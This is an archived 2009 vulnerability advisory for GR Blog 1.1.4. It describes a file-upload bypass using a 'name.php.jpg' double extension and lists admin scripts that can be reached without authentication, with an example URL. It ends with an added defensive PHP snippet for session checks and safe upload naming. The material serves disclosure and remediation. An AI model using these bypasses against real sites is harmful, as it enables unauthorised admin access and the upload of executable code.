
GR Blog 1.1.4 Upload / Bypass

Posted Feb 4, 2009
Authored by JosS | Site spanish-hackers.com

GR Blog version 1.1.4 suffers from remote file upload and authentication bypass vulnerabilities.

tags | exploit, remote, vulnerability, bypass, file upload
SHA-256 | 86b378c7ae8c58c73524e90124620acde3c589ae6a2fac9156118a503ef8c8a3

GR Blog v1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities

Author: Jose Luis Gongora Fernandez
(a.k.a) JosS <sys-project[at]hotmail.com>

Web: http://hack0wn.com/

/*************************/
TESTED ON VERSION GR Blog v1.1.4 (on my localhost)
Download : http://sirini.net/grboard/board.php?id=grblog&articleNo=43
/*************************/

[+] Remote File Upload:

/admin/admin_upload.php (simple bypass)
upload --> name.php.jpg

PATH example: /data/2009/02/04/name.php.jpg


--------------
files: /admin

[+] SIMPLE bypass:

admin_user.php
admin_post.php
admin_all.php
more files...

!xpl: you can enter any of these files

[+] GET bypass:

admin_modify_comment.php
--
<?php
@header('Content-Type: text/html; charset=utf-8');
if(array_key_exists('uid', $_GET) && $_GET['uid']) $uid = $_GET['uid'];
else exit();
--
!xpl: http://localhost/blog/admin/admin_modify_comment.php?uid=1

more files...

[+] POST bypass:

admin_category.php
--
<?php
if(array_key_exists('categoryName', $_POST) && $_POST['categoryName'])
--
!xpl: --

admin_insert.php
--
<?php
$e = true;
if(array_key_exists('postStart', $_POST) && $_POST['postStart'])
--
!xpl: --

more files...

__h0__
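
The two missing checks, as an added defensive example that is not GR Blog code or the author's: a guard each script under /admin would call before doing any work, and upload naming that rejects name.php.jpg. The session key `is_admin`, both function names, the form field `file` and `$uploadDir` are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not GR Blog code. Assumes the login page sets
// $_SESSION['is_admin'] = true after authenticating (hypothetical key).
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// Returns a server-generated file name, or null when the upload is rejected.
function stored_name_for_upload(string $clientName, string $tmpPath): ?string
{
    $images  = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $scripts = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar', 'cgi', 'pl', 'asp'];

    // Inspect every extension, not only the last: name.php.jpg is rejected here.
    $parts = explode('.', strtolower(basename($clientName)));
    array_shift($parts); // drop the base name, keep all extensions
    if ($parts === [] || array_intersect($parts, $scripts) !== []) {
        return null;
    }
    // The final extension must be an allowed image extension.
    if (!in_array(end($parts), ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return null;
    }
    // The content must be an image too, judged from the bytes on disk.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset($images[$mime])) {
        return null;
    }
    // Never store the client-supplied name: random base, server-chosen extension.
    return bin2hex(random_bytes(16)) . '.' . $images[$mime];
}

// In an upload script (the form field name 'file' is an assumption):
//   require_admin();
//   $f = $_FILES['file'];
//   $name = stored_name_for_upload($f['name'], $f['tmp_name']);
//   if ($name === null) { http_response_code(400); exit('Rejected'); }
//   move_uploaded_file($f['tmp_name'], $uploadDir . '/' . $name);
```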

